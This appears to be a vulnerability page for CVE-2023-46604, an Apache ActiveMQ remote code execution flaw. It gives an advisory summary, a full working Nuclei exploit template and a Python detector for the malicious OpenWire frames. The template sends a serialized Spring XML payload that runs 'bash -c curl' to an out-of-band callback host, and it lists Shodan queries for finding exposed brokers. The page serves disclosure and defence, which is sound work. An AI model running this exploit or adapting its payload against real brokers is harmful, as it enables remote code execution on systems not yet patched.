CVE-2023-46604: Apache ActiveMQ - Remote Code Execution

Date: 2025-08-01 | Affected software: Apache ActiveMQ | PoC: public

Vulnerability description

Apache ActiveMQ is vulnerable to Remote Code Execution. The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.

PoC code [public]

id: CVE-2023-46604

info:
  name: Apache ActiveMQ - Remote Code Execution
  author: Ice3man,Mzack9999,pdresearch
  severity: critical
  description: |
    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/10/27/5
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
    - https://github.com/X1r0z/ActiveMQ-RCE
    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
    - https://paper.seebug.org/3058/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46604
    cwe-id: CWE-502
    epss-score: 0.94436
    epss-percentile: 0.99986
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: activemq
    shodan-query:
      - product:"ActiveMQ OpenWire Transport"
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev,vkev
variables:
  prefix: "1f00000000000000000001010042"
  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
  final: "{{prefix}}{{classname}}"

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m1 = require('nuclei/net');
      let m2 = require('nuclei/bytes');
      let b = m2.Buffer();
      let name=Host+':'+Port;
      let conn = m1.Open('tcp', name);
      let randomvar = '{{randstr}}'.toLowerCase();
      var Base64={encode: btoa}
      exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
      packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
      packet+=(exploit_xml.length).toString(16)
      packet+=(b.WriteString(exploit_xml)).Hex()
      conn.SendHex(packet);
      resp = conn.RecvString()
      randomvar

    args:
      Host: "{{Host}}"
      Port: "61616"
      oob: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(interactsh_request, response)'
        condition: and
# digest: 490a0046304402202142a2a04b5af91d5e8c4072d5f3657a303ad098ab2bc366114f604d8660144202204855d9595d04e2226b04497d0f9b159e60fef3f2f935eeb51bfe4c97013afdfb:922c64590222798bb761d5b6d8e72950
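The description above and the template's `prefix`/`classname` variables together spell out the wire layout that gets abused: an OpenWire ExceptionResponse (type 0x1f) whose Throwable "class name" is a Spring XmlApplicationContext and whose "message" is a URL. The following is an added detection example, not part of the original page or the Nuclei project: it parses that loose-encoded layout (as the page's hex shows it, without the 4-byte frame size prefix and without tight/bit-packed encoding, which are assumptions about the capture) and flags frames whose "exception" class is not a Throwable. The sample frame is constructed from the page's own prefix and classname hex plus a placeholder URL.

```python
import struct

EXCEPTION_RESPONSE = 0x1F  # OpenWire command type seen in the page's prefix (0x1f)

# Wire bytes taken from the page's `prefix` and `classname` variables (loose encoding):
# type(1) | commandId(4) | responseRequired(1) | correlationId(4) | throwable-not-null(1)
# | classname-not-null(1) | len(2) | classname | message-not-null(1) ; len(2)+message follow.
PREFIX_HEX = "1f00000000000000000001010042"
CLASSNAME_HEX = ("6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f7274"
                 "2e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401")
# Constructed sample: the page's prefix/classname followed by a placeholder "message" URL.
SAMPLE_MESSAGE = "http://placeholder.invalid/poc.xml"
SUSPICIOUS_FRAME = (bytes.fromhex(PREFIX_HEX + CLASSNAME_HEX)
                    + struct.pack(">H", len(SAMPLE_MESSAGE)) + SAMPLE_MESSAGE.encode())

def read_string(buf, pos):
    """OpenWire loose string: not-null flag, then 2-byte big-endian length and UTF-8 bytes."""
    if buf[pos] == 0:
        return None, pos + 1
    (n,) = struct.unpack_from(">H", buf, pos + 1)
    start = pos + 3
    return buf[start:start + n].decode("utf-8"), start + n

def parse_exception_response(frame):
    """Return the Throwable class name and message carried by an ExceptionResponse."""
    if frame[0] != EXCEPTION_RESPONSE:
        raise ValueError("not an ExceptionResponse command")
    command_id, _response_required, correlation_id = struct.unpack_from(">IBI", frame, 1)
    pos = 10
    if frame[pos] == 0:  # null Throwable: nothing for the broker to instantiate
        return {"command_id": command_id, "correlation_id": correlation_id, "class": None, "message": None}
    cls, pos = read_string(frame, pos + 1)
    msg, _ = read_string(frame, pos)
    return {"command_id": command_id, "correlation_id": correlation_id, "class": cls, "message": msg}

def is_suspicious(parsed):
    """Flag the CVE-2023-46604 pattern: the 'exception' class is not a Throwable at all
    (e.g. a Spring XmlApplicationContext) and its 'message' is a URL to load config from."""
    cls = parsed["class"] or ""
    msg = parsed["message"] or ""
    if not cls.endswith(("Exception", "Error", "Throwable")):
        return True
    return "ApplicationContext" in cls or msg.lower().startswith(("http://", "https://", "file:"))

def build_frame(cls, msg):
    """Constructed test fixture: encode a benign ExceptionResponse in the same loose layout."""
    def s(x):
        return b"\x01" + struct.pack(">H", len(x.encode())) + x.encode()
    return bytes([EXCEPTION_RESPONSE]) + struct.pack(">IBI", 0, 0, 0) + b"\x01" + s(cls) + s(msg)
```

A broker that has been patched to 5.15.16/5.16.7/5.17.6/5.18.3 rejects such class names itself; this check is for inspecting captured OpenWire traffic to port 61616 on brokers that have not yet been upgraded.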
